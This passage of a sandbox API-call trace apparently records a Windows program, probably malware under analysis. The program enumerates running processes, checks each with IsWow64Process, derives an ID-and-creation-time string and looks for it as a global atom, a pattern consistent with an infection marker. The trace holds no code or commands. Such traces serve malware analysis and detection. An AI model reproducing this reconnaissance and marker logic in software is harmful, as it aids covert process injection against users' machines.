	[0122.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.630] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.630] CloseHandle (hObject=0x698) returned 1
	[0122.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.631] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.631] CloseHandle (hObject=0x698) returned 1
	[0122.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399cea8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0122.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a60, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.631] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.631] CloseHandle (hObject=0x698) returned 1
	[0122.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.632] CloseHandle (hObject=0x698) returned 1
	[0122.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5a00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.632] CloseHandle (hObject=0x698) returned 1
	[0122.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.632] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.632] CloseHandle (hObject=0x698) returned 1
	[0122.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.633] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.633] CloseHandle (hObject=0x698) returned 1
	[0122.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.633] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.633] CloseHandle (hObject=0x698) returned 1
	[0122.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.634] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.634] CloseHandle (hObject=0x698) returned 1
	[0122.634] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5ad8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.634] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.634] CloseHandle (hObject=0x698) returned 1
	[0122.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.635] CloseHandle (hObject=0x698) returned 1
	[0122.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.635] CloseHandle (hObject=0x698) returned 1
	[0122.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.635] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.635] CloseHandle (hObject=0x698) returned 1
	[0122.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d618, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.636] CloseHandle (hObject=0x698) returned 1
	[0122.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399cea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0122.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.636] CloseHandle (hObject=0x698) returned 1
	[0122.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9820, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0122.636] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.636] CloseHandle (hObject=0x698) returned 1
	[0122.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.637] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.637] CloseHandle (hObject=0x698) returned 1
	[0122.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5a30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0122.637] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.637] CloseHandle (hObject=0x698) returned 1
	[0122.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5ad8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.637] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.637] CloseHandle (hObject=0x698) returned 1
	[0122.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399cea8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0122.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.638] CloseHandle (hObject=0x698) returned 1
	[0122.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399cea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0122.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.638] CloseHandle (hObject=0x698) returned 1
	[0122.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5aa8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.638] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.638] CloseHandle (hObject=0x698) returned 1
	[0122.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.639] CloseHandle (hObject=0x698) returned 1
	[0122.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b99d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0122.639] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.639] CloseHandle (hObject=0x698) returned 1
	[0122.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5a00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.640] CloseHandle (hObject=0x698) returned 1
	[0122.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.640] CloseHandle (hObject=0x698) returned 1
	[0122.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399cea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0122.640] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.640] CloseHandle (hObject=0x698) returned 1
	[0122.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5a00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0122.641] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.641] CloseHandle (hObject=0x698) returned 1
	[0122.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399cea8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0122.641] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.641] CloseHandle (hObject=0x698) returned 1
	[0122.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9938, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0122.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.642] CloseHandle (hObject=0x698) returned 1
	[0122.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9a28, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0122.642] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.642] CloseHandle (hObject=0x698) returned 1
	[0122.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.642] GetLastError () returned 0x5
	[0122.642] GetLastError () returned 0x5
	[0122.642] GetLastError () returned 0x5
	[0122.642] GetLastError () returned 0x5
	[0122.642] GetLastError () returned 0x5
	[0122.642] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.643] GetLastError () returned 0x5
	[0122.644] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.644] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0122.644] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.644] GetLastError () returned 0x5
	[0122.645] wsprintfA (in: param_1=0x3993a10, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.645] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetLastError () returned 0x5
	[0122.646] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.647] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0122.647] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0122.647] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0122.647] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0122.647] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0122.647] CloseHandle (hObject=0x698) returned 1
	[0122.647] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0122.647] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0122.648] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.648] CloseHandle (hObject=0x698) returned 1
	[0122.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5e8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0122.648] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.648] CloseHandle (hObject=0x698) returned 1
	[0122.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5b68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0122.648] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.648] CloseHandle (hObject=0x698) returned 1
	[0122.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5aa8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.649] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0122.649] CloseHandle (hObject=0x698) returned 1
	[0122.649] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a30, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0122.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16e18) returned 0xc0000004
	[0122.687] VirtualAlloc (lpAddress=0x0, dwSize=0x16f18, flAllocationType=0x3000, flProtect=0x4) returned 0x3c20000
	[0122.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c20000, Length=0x16f18, ResultLength=0x0 | out: SystemInformation=0x3c20000, ResultLength=0x0) returned 0x0
	[0122.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0122.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5b98, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0122.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5ad8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0122.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0122.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5a00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
